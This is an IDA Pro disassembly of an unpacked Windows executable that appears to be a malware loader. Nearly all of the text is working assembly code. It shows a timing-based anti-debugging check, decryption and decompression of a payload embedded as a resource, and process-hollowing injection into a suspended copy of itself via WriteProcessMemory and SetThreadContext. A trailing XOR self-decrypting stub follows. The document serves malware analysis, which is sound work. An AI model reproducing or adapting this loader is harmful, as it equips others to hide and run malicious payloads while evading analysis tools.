;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 4FACE6F0C49DA5E702EBC6A2C0F14FBB
; File Name : u:\work\4face6f0c49da5e702ebc6a2c0f14fbb_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 10000000
; Section 1. (virtual address 00001000)
; Virtual size : 00000971 ( 2417.)
; Section size in file : 00000971 ( 2417.)
; Offset to raw data for section: 00001000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 10001000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
public start
start proc near
nop
nop
nop
nop
nop
nop
call sub_10001022
call sub_10001078
push dword_1000372C
call sub_10001208
push 0
call sub_10001450 ; ExitProcess
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_10001022 proc near ; CODE XREF: start+6�p
call sub_10001468 ; GetTickCount
mov dword_10003774, eax
push 64h
call sub_10001492 ; Sleep
call sub_10001468 ; GetTickCount
mov dword_10003778, eax
push 64h
call sub_10001492 ; Sleep
call sub_10001468 ; GetTickCount
mov dword_1000377C, eax
mov eax, dword_10003774
mov ebx, dword_10003778
sub ebx, eax
mov ecx, dword_1000377C
sub ecx, eax
cmp ebx, 64h
jnb short locret_10001077
cmp ecx, 0C8h
jnb short locret_10001077
push 0
call sub_10001450 ; ExitProcess
locret_10001077: ; CODE XREF: sub_10001022+44�j
; sub_10001022+4C�j
retn
sub_10001022 endp
; =============== S U B R O U T I N E =======================================
sub_10001078 proc near ; CODE XREF: start+B�p
push 0Ah
push 7
push 0
call sub_10001456 ; FindResourceA
mov dword_10003720, eax
push eax
push 0
call sub_1000146E ; LoadResource
mov dword_10003724, eax
push dword_10003720
push 0
call sub_1000148C ; SizeofResource
mov dword_10003730, eax
push dword_10003724
call sub_10001474 ; SetHandleCount
mov dword_10003728, eax
mov ecx, dword_10003730
mov edi, dword_10003728
jmp short loc_100010CE
; ---------------------------------------------------------------------------
loc_100010C5: ; CODE XREF: sub_10001078+58�j
dec ecx
rol byte ptr [ecx+edi], 8
xor byte ptr [ecx+edi], 8
loc_100010CE: ; CODE XREF: sub_10001078+4B�j
or ecx, ecx
jnz short loc_100010C5
push dword_10003728
call sub_100014B0
add esp, 4
mov dword_10003734, eax
push 4
push 1000h
push dword_10003734
push 0
call sub_10001498 ; VirtualAlloc
mov dword_1000372C, eax
push dword_10003734
push dword_1000372C
push dword_10003730
push dword_10003728
call sub_100014E0
add esp, 10h
retn
sub_10001078 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000111F proc near ; CODE XREF: sub_10001208+A9�p
; sub_10001208+10B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
mov eax, [ebp+arg_0]
div [ebp+arg_4]
or edx, edx
jnz short loc_10001133
mov eax, [ebp+arg_0]
jmp short locret_10001142
; ---------------------------------------------------------------------------
loc_10001133: ; CODE XREF: sub_1000111F+D�j
mov edx, 0
mov eax, [ebp+arg_0]
div [ebp+arg_4]
inc eax
mul [ebp+arg_4]
locret_10001142: ; CODE XREF: sub_1000111F+12�j
leave
retn 8
sub_1000111F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001146 proc near ; CODE XREF: sub_10001208+12�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov esi, [ebp+arg_0]
add esi, [esi+3Ch]
mov dword_10003738, esi
mov eax, [esi+38h]
mov dword_1000373C, eax
movzx eax, word ptr [esi+6]
mov dword_10003740, eax
movzx ecx, word ptr [esi+14h]
add ecx, 18h
add esi, ecx
mov dword_10003744, esi
mov esi, dword_10003738
xor edx, edx
mov eax, [esi+54h]
div dword_1000373C
or edx, edx
jnz short loc_10001194
mov eax, [esi+54h]
mov dword_10003770, eax
jmp short loc_100011AC
; ---------------------------------------------------------------------------
loc_10001194: ; CODE XREF: sub_10001146+42�j
xor edx, edx
mov eax, [esi+54h]
div dword_1000373C
inc eax
mul dword_1000373C
add dword_10003770, eax
loc_100011AC: ; CODE XREF: sub_10001146+4C�j
mov ecx, 0
mov edi, dword_10003744
loc_100011B7: ; CODE XREF: sub_10001146+B7�j
cmp ecx, dword_10003740
jz short loc_100011FF
push ecx
cmp dword ptr [edi+8], 0
jz short loc_100011F8
xor edx, edx
mov eax, [edi+8]
div dword_1000373C
or edx, edx
jnz short loc_100011E0
mov eax, [edi+8]
add dword_10003770, eax
jmp short loc_100011F8
; ---------------------------------------------------------------------------
loc_100011E0: ; CODE XREF: sub_10001146+8D�j
xor edx, edx
mov eax, [edi+8]
div dword_1000373C
inc eax
mul dword_1000373C
add dword_10003770, eax
loc_100011F8: ; CODE XREF: sub_10001146+7E�j
; sub_10001146+98�j
pop ecx
inc ecx
add edi, 28h
jmp short loc_100011B7
; ---------------------------------------------------------------------------
loc_100011FF: ; CODE XREF: sub_10001146+77�j
mov eax, dword_10003770
leave
retn 4
sub_10001146 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001208 proc near ; CODE XREF: start+16�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov esi, [ebp+arg_0]
add esi, [esi+3Ch]
mov dword_10003748, esi
push [ebp+arg_0]
call sub_10001146
mov dword_10003754, eax
push 4
push 1000h
push dword_10003754
push 0
call sub_10001498 ; VirtualAlloc
mov dword_10003758, eax
mov eax, dword_10003758
mov dword_1000375C, eax
mov esi, dword_10003748
mov eax, [esi+54h]
mov dword_10003760, eax
movzx ecx, word ptr [esi+14h]
add ecx, 18h
add esi, ecx
mov dword_10003764, esi
mov esi, dword_10003744
mov edi, dword_10003738
mov ecx, 0
mov ebx, dword_10003760
loc_1000127B: ; CODE XREF: sub_10001208+8C�j
cmp ecx, dword_10003740
jz short loc_10001296
cmp [esi+14h], ebx
jnb short loc_10001290
mov eax, [esi+14h]
mov dword_10003760, eax
loc_10001290: ; CODE XREF: sub_10001208+7E�j
inc ecx
add esi, 28h
jmp short loc_1000127B
; ---------------------------------------------------------------------------
loc_10001296: ; CODE XREF: sub_10001208+79�j
push edi
mov edi, dword_1000375C
mov esi, [ebp+arg_0]
mov ecx, dword_10003760
rep movsb
pop edi
mov eax, [edi+54h]
mov ebx, [edi+38h]
push ebx
push eax
call sub_1000111F
add dword_1000375C, eax
mov ecx, 0
mov esi, dword_10003744
mov edi, dword_10003738
loc_100012CD: ; CODE XREF: sub_10001208+136�j
cmp ecx, dword_10003740
jz short loc_10001340
push ecx
cmp dword ptr [esi+10h], 0
jbe short loc_10001320
mov eax, [esi+10h]
mov dword_10003768, eax
cmp eax, [esi+8]
jbe short loc_100012F1
mov eax, [esi+8]
mov dword_10003768, eax
loc_100012F1: ; CODE XREF: sub_10001208+DF�j
mov eax, [esi+14h]
add eax, [ebp+arg_0]
push edi
push esi
mov edi, dword_1000375C
mov esi, eax
mov ecx, dword_10003768
rep movsb
pop esi
pop edi
mov eax, [esi+8]
mov ebx, [edi+38h]
push ebx
push eax
call sub_1000111F
add dword_1000375C, eax
jmp short loc_10001339
; ---------------------------------------------------------------------------
loc_10001320: ; CODE XREF: sub_10001208+D2�j
cmp dword ptr [esi+8], 0
jz short loc_10001339
mov eax, [esi+8]
mov ebx, [edi+38h]
push ebx
push eax
call sub_1000111F
add dword_1000375C, eax
loc_10001339: ; CODE XREF: sub_10001208+116�j
; sub_10001208+11C�j
pop ecx
inc ecx
add esi, 28h
jmp short loc_100012CD
; ---------------------------------------------------------------------------
loc_10001340: ; CODE XREF: sub_10001208+CB�j
push 78h
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 0
call sub_1000145C ; GetModuleFileNameA
push offset dword_10003044
push offset dword_10003000
push 0
push 0
push 4
push 0
push 0
push 0
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 0
call sub_1000144A ; CreateProcessA
mov dword_10003054, 10007h
push offset dword_10003054
push dword_10003048
call sub_10001462 ; GetThreadContext
mov ebx, dword_100030F8
add ebx, 8
push 0
push 4
push offset dword_1000376C
push ebx
push dword_10003044
call sub_1000147A ; ReadProcessMemory
push 40h
push 3000h
push dword_10003754
push dword ptr [edi+34h]
push dword_10003044
call sub_1000149E ; VirtualAllocEx
push 0
push dword_10003754
push dword_10003758
push dword ptr [edi+34h]
push dword_10003044
call sub_100014AA ; WriteProcessMemory
mov ebx, dword_100030F8
add ebx, 8
push 0
push 4
lea eax, [edi+34h]
push eax
push ebx
push dword_10003044
call sub_100014AA ; WriteProcessMemory
mov eax, [edi+34h]
add eax, [edi+28h]
mov dword_10003104, eax
push offset dword_10003054
push dword_10003048
call sub_10001486 ; SetThreadContext
push dword_10003048
call sub_10001480 ; ResumeThread
push 8000h
push 0
push dword_1000372C
call sub_100014A4 ; VirtualFree
push 8000h
push 0
push dword_10003758
call sub_100014A4 ; VirtualFree
leave
retn 4
sub_10001208 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000144A proc near ; CODE XREF: sub_10001208+163�p
jmp ds:dword_10002000
sub_1000144A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001450 proc near ; CODE XREF: start+1D�p
; sub_10001022+50�p
jmp ds:dword_10002004
sub_10001450 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001456 proc near ; CODE XREF: sub_10001078+6�p
jmp ds:dword_10002008
sub_10001456 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000145C proc near ; CODE XREF: sub_10001208+141�p
jmp ds:dword_1000200C
sub_1000145C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001462 proc near ; CODE XREF: sub_10001208+17D�p
jmp ds:dword_10002010
sub_10001462 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001468 proc near ; CODE XREF: sub_10001022�p
; sub_10001022+11�p ...
jmp ds:dword_10002014
sub_10001468 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000146E proc near ; CODE XREF: sub_10001078+13�p
jmp ds:dword_10002018
sub_1000146E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001474 proc near ; CODE XREF: sub_10001078+35�p
jmp ds:dword_1000201C
sub_10001474 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000147A proc near ; CODE XREF: sub_10001208+19B�p
jmp ds:dword_10002020
sub_1000147A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001480 proc near ; CODE XREF: sub_10001208+215�p
jmp ds:dword_10002024
sub_10001480 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001486 proc near ; CODE XREF: sub_10001208+20A�p
jmp ds:dword_10002028
sub_10001486 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000148C proc near ; CODE XREF: sub_10001078+25�p
jmp ds:dword_1000202C
sub_1000148C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001492 proc near ; CODE XREF: sub_10001022+C�p
; sub_10001022+1D�p
jmp ds:dword_10002030
sub_10001492 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001498 proc near ; CODE XREF: sub_10001078+7C�p
; sub_10001208+2B�p
jmp ds:dword_10002034
sub_10001498 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000149E proc near ; CODE XREF: sub_10001208+1B6�p
jmp ds:dword_10002038
sub_1000149E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100014A4 proc near ; CODE XREF: sub_10001208+227�p
; sub_10001208+239�p
jmp ds:dword_1000203C
sub_100014A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100014AA proc near ; CODE XREF: sub_10001208+1D2�p
; sub_10001208+1EF�p
jmp ds:dword_10002040
sub_100014AA endp
; =============== S U B R O U T I N E =======================================
sub_100014B0 proc near ; CODE XREF: sub_10001078+60�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
pusha
mov esi, [esp+20h+arg_0]
mov ebx, [esi]
or eax, 0FFFFFFFFh
cmp ebx, 32335041h
jnz short loc_100014CD
mov ebx, [esi+4]
cmp ebx, 18h
jb short loc_100014CD
mov eax, [esi+10h]
loc_100014CD: ; CODE XREF: sub_100014B0+10�j
; sub_100014B0+18�j
mov [esp+20h+var_4], eax
popa
retn
sub_100014B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_100014E0 proc near ; CODE XREF: sub_10001078+9E�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
pusha
mov esi, [esp+20h+arg_0]
mov ecx, [esp+20h+arg_4]
mov edi, [esp+20h+arg_8]
test esi, esi
jz short loc_10001557
test edi, edi
jz short loc_10001557
cmp ecx, 18h
jb short loc_10001557
mov ebx, [esi]
cmp ebx, 32335041h
jnz short loc_10001557
mov ebx, [esi+4]
cmp ebx, 18h
jb short loc_10001557
sub ecx, ebx
jb short loc_10001557
cmp [esi+8], ecx
ja short loc_10001557
add ebx, esi
push dword ptr [esi+8]
push ebx
call sub_10001840
add esp, 8
cmp eax, [esi+0Ch]
jnz short loc_10001557
mov ecx, [esp+20h+arg_C]
cmp [esi+10h], ecx
ja short loc_10001557
push ecx
push edi
push dword ptr [esi+8]
push ebx
call sub_10001560
add esp, 10h
cmp eax, [esi+10h]
jnz short loc_10001557
mov ebx, eax
push eax
push edi
call sub_10001840
add esp, 8
cmp eax, [esi+14h]
mov eax, ebx
jz short loc_1000155A
loc_10001557: ; CODE XREF: sub_100014E0+F�j
; sub_100014E0+13�j ...
or eax, 0FFFFFFFFh
loc_1000155A: ; CODE XREF: sub_100014E0+75�j
mov [esp+20h+var_4], eax
popa
retn
sub_100014E0 endp
; =============== S U B R O U T I N E =======================================
sub_10001560 proc near ; CODE XREF: sub_100014E0+57�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
pusha
mov esi, [esp+20h+arg_0]
mov eax, [esp+20h+arg_4]
mov edi, [esp+20h+arg_8]
mov ecx, [esp+20h+arg_C]
push eax
push ecx
test esi, esi
jz loc_10001826
test edi, edi
jz loc_10001826
cld
xor edx, edx
loc_10001586: ; CODE XREF: sub_10001560:loc_100015C0�j
sub [esp+28h+var_24], 1
jb loc_10001826
mov al, [esi]
add esi, 1
sub [esp+28h+var_28], 1
jb loc_10001826
mov [edi], al
add edi, 1
mov ebx, 2
loc_100015AA: ; CODE XREF: sub_10001560+129�j
; sub_10001560+1D4�j ...
add dl, dl
jnz short loc_100015C0
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_100015C0: ; CODE XREF: sub_10001560+4C�j
jnb short loc_10001586
add dl, dl
jnz short loc_100015D8
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_100015D8: ; CODE XREF: sub_10001560+64�j
jnb loc_1000168E
xor eax, eax
add dl, dl
jnz short loc_100015F6
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_100015F6: ; CODE XREF: sub_10001560+82�j
jnb loc_100017DB
add dl, dl
jnz short loc_10001612
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_10001612: ; CODE XREF: sub_10001560+9E�j
adc eax, eax
add dl, dl
jnz short loc_1000162A
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_1000162A: ; CODE XREF: sub_10001560+B6�j
adc eax, eax
add dl, dl
jnz short loc_10001642
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_10001642: ; CODE XREF: sub_10001560+CE�j
adc eax, eax
add dl, dl
jnz short loc_1000165A
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_1000165A: ; CODE XREF: sub_10001560+E6�j
adc eax, eax
jz loc_10001677
mov ebx, [esp+28h+arg_C]
sub ebx, [esp+28h+var_28]
cmp eax, ebx
ja loc_10001826
mov ebx, edi
sub ebx, eax
mov al, [ebx]
loc_10001677: ; CODE XREF: sub_10001560+FC�j
sub [esp+28h+var_28], 1
jb loc_10001826
mov [edi], al
inc edi
mov ebx, 2
jmp loc_100015AA
; ---------------------------------------------------------------------------
loc_1000168E: ; CODE XREF: sub_10001560:loc_100015D8�j
mov eax, 1
loc_10001693: ; CODE XREF: sub_10001560:loc_100016C7�j
add dl, dl
jnz short loc_100016A9
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_100016A9: ; CODE XREF: sub_10001560+135�j
adc eax, eax
jb loc_10001826
add dl, dl
jnz short loc_100016C7
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_100016C7: ; CODE XREF: sub_10001560+153�j
jb short loc_10001693
sub eax, ebx
mov ebx, 1
jnz loc_10001739
mov ecx, 1
loc_100016DB: ; CODE XREF: sub_10001560:loc_1000170F�j
add dl, dl
jnz short loc_100016F1
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_100016F1: ; CODE XREF: sub_10001560+17D�j
adc ecx, ecx
jb loc_10001826
add dl, dl
jnz short loc_1000170F
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_1000170F: ; CODE XREF: sub_10001560+19B�j
jb short loc_100016DB
push ecx
mov ecx, [esp+2Ch+arg_C]
sub ecx, [esp+2Ch+var_28]
cmp ebp, ecx
pop ecx
ja loc_10001826
sub [esp+28h+var_28], ecx
jb loc_10001826
push esi
mov esi, edi
sub esi, ebp
rep movsb
pop esi
jmp loc_100015AA
; ---------------------------------------------------------------------------
loc_10001739: ; CODE XREF: sub_10001560+170�j
dec eax
test eax, 0FF000000h
jnz loc_10001826
shl eax, 8
sub [esp+28h+var_24], 1
jb loc_10001826
mov al, [esi]
inc esi
mov ebp, eax
mov ecx, 1
loc_1000175D: ; CODE XREF: sub_10001560:loc_10001791�j
add dl, dl
jnz short loc_10001773
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_10001773: ; CODE XREF: sub_10001560+1FF�j
adc ecx, ecx
jb loc_10001826
add dl, dl
jnz short loc_10001791
sub [esp+28h+var_24], 1
jb loc_10001826
mov dl, [esi]
inc esi
add dl, dl
inc dl
loc_10001791: ; CODE XREF: sub_10001560+21D�j
jb short loc_1000175D
cmp eax, 7D00h
sbb ecx, 0FFFFFFFFh
cmp eax, 500h
sbb ecx, 0FFFFFFFFh
cmp eax, 80h
adc ecx, 0
cmp eax, 80h
adc ecx, 0
push ecx
mov ecx, [esp+2Ch+arg_C]
sub ecx, [esp+2Ch+var_28]
cmp eax, ecx
pop ecx
ja loc_10001826
sub [esp+28h+var_28], ecx
jb loc_10001826
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp loc_100015AA
; ---------------------------------------------------------------------------
loc_100017DB: ; CODE XREF: sub_10001560:loc_100015F6�j
sub [esp+28h+var_24], 1
jb loc_10001826
mov al, [esi]
inc esi
xor ecx, ecx
shr al, 1
jz loc_1000182E
adc ecx, 2
mov ebp, eax
push ecx
mov ecx, [esp+2Ch+arg_C]
sub ecx, [esp+2Ch+var_28]
cmp eax, ecx
pop ecx
ja loc_10001826
sub [esp+28h+var_28], ecx
jb loc_10001826
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
mov ebx, 1
jmp loc_100015AA
; ---------------------------------------------------------------------------
loc_10001826: ; CODE XREF: sub_10001560+15�j
; sub_10001560+1D�j ...
add esp, 8
popa
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_1000182E: ; CODE XREF: sub_10001560+28E�j
add esp, 8
sub edi, [esp+20h+arg_8]
mov [esp+20h+var_4], edi
popa
retn
sub_10001560 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001840 proc near ; CODE XREF: sub_100014E0+3B�p
; sub_100014E0+68�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
pusha
mov esi, [esp+20h+arg_0]
mov ecx, [esp+20h+arg_4]
mov edi, offset dword_10003320
sub eax, eax
test esi, esi
jz loc_10001920
sub eax, 1
test ecx, ecx
jz loc_1000191E
loc_10001863: ; CODE XREF: sub_10001840+3C�j
test esi, 3
jz short loc_1000187E
xor al, [esi]
inc esi
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
dec ecx
jnz short loc_10001863
loc_1000187E: ; CODE XREF: sub_10001840+29�j
mov edx, ecx
and edx, 7
shr ecx, 3
jz loc_10001905
loc_1000188C: ; CODE XREF: sub_10001840+BF�j
xor eax, [esi]
add esi, 4
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
xor eax, [esi]
add esi, 4
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
dec ecx
jnz loc_1000188C
loc_10001905: ; CODE XREF: sub_10001840+46�j
mov ecx, edx
test ecx, ecx
jz short loc_1000191E
loc_1000190B: ; CODE XREF: sub_10001840+DC�j
xor al, [esi]
inc esi
mov ebx, 0FFh
and ebx, eax
shr eax, 8
xor eax, [edi+ebx*4]
dec ecx
jnz short loc_1000190B
loc_1000191E: ; CODE XREF: sub_10001840+1D�j
; sub_10001840+C9�j
not eax
loc_10001920: ; CODE XREF: sub_10001840+12�j
mov [esp+20h+var_4], eax
popa
retn
sub_10001840 endp
; ---------------------------------------------------------------------------
dw 2960h
db 0C0h
; ---------------------------------------------------------------------------
loc_10001929: ; CODE XREF: .text:1000192F�j
dec al
or al, al
jz short loc_10001933
jnz short loc_10001929
; ---------------------------------------------------------------------------
db 0EBh, 67h
; ---------------------------------------------------------------------------
loc_10001933: ; CODE XREF: .text:1000192D�j
sub edx, edx
sub ecx, ecx
mov cl, 1Fh
loc_10001939: ; CODE XREF: .text:1000193B�j
inc edx
dec ecx
jnz short loc_10001939
call sub_1000196E
add ecx, 0EBB5h
xor edi, edi
or edi, 2487h
push ecx
loc_10001951: ; CODE XREF: .text:10001963�j
mov al, [ecx]
xor ax, dx
xchg al, [ecx]
add ecx, 1
add dx, 3Ch
dec edi
or edi, edi
jnz short loc_10001951
pop ecx
mov [esp+18h], ecx
popa
jmp ecx
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
sub_1000196E proc near ; CODE XREF: .text:1000193D�p
pop ecx
jmp ecx
sub_1000196E endp ; sp-analysis failed
_text ends
; Section 2. (virtual address 00002000)
; Virtual size : 000001E8 ( 488.)
; Section size in file : 000001E8 ( 488.)
; Offset to raw data for section: 00002000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 10002000h
dword_10002000 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_10002004 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_10002008 dd 7C80BE89h ; resolved to->KERNEL32.FindResourceAdword_1000200C dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_10002010 dd 7C83970Dh ; resolved to->KERNEL32.GetThreadContextdword_10002014 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_10002018 dd 7C809FB5h ; resolved to->KERNEL32.LoadResourcedword_1000201C dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_10002020 dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemorydword_10002024 dd 7C8328F7h ; resolved to->KERNEL32.ResumeThreaddword_10002028 dd 7C862A69h ; resolved to->KERNEL32.SetThreadContextdword_1000202C dd 7C80BC69h ; resolved to->KERNEL32.SizeofResourcedword_10002030 dd 7C802442h ; resolved to->KERNEL32.Sleepdword_10002034 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_10002038 dd 7C809A72h ; resolved to->KERNEL32.VirtualAllocExdword_1000203C dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_10002040 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemory align 8
dd 2070h, 2 dup(0)
dd 21DAh, 2000h, 5 dup(0)
dd 20B8h, 20CAh, 20D8h, 20E8h, 20FEh, 2112h, 2122h, 2132h
dd 2142h, 2156h, 2166h, 217Ah, 218Ch, 2194h, 21A4h, 21B6h
dd 21C4h, 0
db 40h ; @
align 2
aCreateprocessa db 'CreateProcessA',0
align 2
aA db '',0
aExitprocess db 'ExitProcess',0
aV db '',0
aFindresourcea db 'FindResourceA',0
db 7
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 14Ch
aGetthreadconte db 'GetThreadContext',0
align 2
dw 152h
aGettickcount db 'GetTickCount',0
align 2
dw 1A9h
aLoadresource db 'LoadResource',0
align 2
dw 1B7h
aLockresource db 'LockResource',0
align 2
dw 1FAh
aReadprocessmem db 'ReadProcessMemory',0
dw 207h
aResumethread db 'ResumeThread',0
align 2
dw 24Fh
aSetthreadconte db 'SetThreadContext',0
align 2
dw 25Fh
aSizeofresource db 'SizeofResource',0
align 4
db 60h ; `
db 2, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 81h ;
db 2, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 4
db 82h ;
db 2, 56h, 69h
aRtualallocex db 'rtualAllocEx',0
align 2
dw 283h
aVirtualfree db 'VirtualFree',0
db 0A7h ;
db 2, 57h, 72h
aIteprocessmemo db 'iteProcessMemory',0
align 2
aKernel32_dll db 'kernel32.dll',0
align 4
_rdata ends
; Section 3. (virtual address 00003000)
; Virtual size : 000007F8 ( 2040.)
; Section size in file : 000007F8 ( 2040.)
; Offset to raw data for section: 00003000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 10003000h
dword_10003000 dd 11h dup(0) dword_10003044 dd 2Ch ; sub_10001208+195�r ...
dword_10003048 dd 34h ; sub_10001208+204�r ...
dd 62Ch, 6DCh
dword_10003054 dd 10007h ; sub_10001208+172�o ...
dd 23h dup(0)
dd 38h, 2 dup(23h), 7C910732h, 7C9106ABh
dword_100030F8 dd 7FFDE000h ; sub_10001208+1D7�r
dd 224h, 7C9012D6h
dword_10003104 dd 420001h dd 7C916C54h, 7C810665h, 1Bh, 200h, 12FFFCh, 23h, 80h dup(0)
dword_10003320 dd 0 dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
